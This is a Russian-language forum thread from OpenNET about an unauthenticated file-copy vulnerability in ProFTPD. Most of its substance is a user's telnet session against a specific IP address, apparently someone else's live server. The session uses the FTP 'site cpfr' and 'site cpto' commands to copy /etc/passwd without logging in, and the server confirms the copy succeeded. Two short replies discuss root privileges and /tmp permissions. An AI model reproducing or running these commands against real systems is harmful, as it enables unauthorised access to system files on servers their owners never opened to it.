The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]



Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Режим отображения отдельной подветви беседы [ Отслеживать ]

Оглавление

Опасная уязвимость в ProFTPD, проявляющаяся без аутентификации, opennews (??), 10-Апр-15, (0) [смотреть все]

Сообщения [Сортировка по времени | RSS]


5. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от luzerz (?), 10-Апр-15, 09:41 
у них уже не работает(
Trying 80.150.216.115...
Connected to 80.150.216.115.
Escape character is '^]'.
220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:80.150.216.115]
site cpfr /etc/passwd
350 File or directory exists, ready for destination name
   site cpto /tmp/passwd.copy
500 Invalid command: try being more creative
Ответить | Правка | Наверх | Cообщить модератору

6. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от luzerz (?), 10-Апр-15, 09:41 
хотя не
скопипастил криво
работает
site cpto /tmp/passwd.copy
250 Copy successful
Ответить | Правка | Наверх | Cообщить модератору

19. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от Аноним (-), 10-Апр-15, 11:59 
фтп демон от рута работает штоль?
Зачем вообще выполнять команды до аунтификации?
Ответить | Правка | Наверх | Cообщить модератору

85. "Опасная уязвимость в ProFTPD, проявляющаяся без аутентификац..."  +/
Сообщение от Nas_tradamus (ok), 12-Апр-15, 13:44 
В /tmp любой юзер может писать.
Ответить | Правка | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру